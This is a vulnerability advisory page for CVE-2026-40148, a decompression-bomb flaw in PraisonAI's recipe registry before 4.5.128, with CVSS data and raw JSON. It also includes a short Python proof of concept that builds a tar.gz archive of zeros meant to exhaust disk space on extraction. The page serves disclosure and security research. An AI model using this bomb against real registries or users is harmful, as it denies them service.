Security Vulnerability Report
中文
CVE-2026-40148 CVSS 6.5 MEDIUM

CVE-2026-40148

Published: 2026-04-09 22:16:36
Last Modified: 2026-04-17 17:38:44
Source: [email protected]

Description

PraisonAI is a multi-agent teams system. Prior to 4.5.128, the _safe_extractall() function in PraisonAI's recipe registry validates archive members against path traversal attacks but performs no checks on individual member sizes, cumulative extracted size, or member count before calling tar.extractall(). An attacker can publish a malicious recipe bundle containing highly compressible data (e.g., 10GB of zeros compressing to ~10MB) that exhausts the victim's disk when pulled via LocalRegistry.pull() or HttpRegistry.pull(). This vulnerability is fixed in 4.5.128.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE
PraisonAI < 4.5.128

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import tarfile import io # Create a malicious archive (Zip bomb / Decompression bomb) # This script creates a tar file containing a file with a large amount of zeros. # When extracted, it consumes significant disk space. def create_malicious_tar(output_filename): # Create an in-memory byte stream with io.BytesIO() as stream: with tarfile.open(fileobj=stream, mode='w:gz') as tar: # Add a file containing 1GB of zeros (sparse file concept or just zeros) # Note: In a real exploit, this would be much larger (e.g., 10GB) data = b'\x00' * (1024 * 1024 * 100) # 100MB of zeros for demonstration info = tarfile.TarInfo(name="large_file.bin") info.size = len(data) tar.addfile(info, io.BytesIO(data)) # Write the compressed stream to a file with open(output_filename, 'wb') as f: f.write(stream.getvalue()) print(f"[+] Malicious archive '{output_filename}' created.") if __name__ == "__main__": create_malicious_tar("malicious_recipe.tar.gz")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40148", "sourceIdentifier": "[email protected]", "published": "2026-04-09T22:16:35.600", "lastModified": "2026-04-17T17:38:43.593", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Prior to 4.5.128, the _safe_extractall() function in PraisonAI's recipe registry validates archive members against path traversal attacks but performs no checks on individual member sizes, cumulative extracted size, or member count before calling tar.extractall(). An attacker can publish a malicious recipe bundle containing highly compressible data (e.g., 10GB of zeros compressing to ~10MB) that exhausts the victim's disk when pulled via LocalRegistry.pull() or HttpRegistry.pull(). This vulnerability is fixed in 4.5.128."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-409"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.128", "matchCriteriaId": "56CDE5F5-B03C-4C3A-9A92-F61C9DFDA9B1"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-f2h6-7xfr-xm8w", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.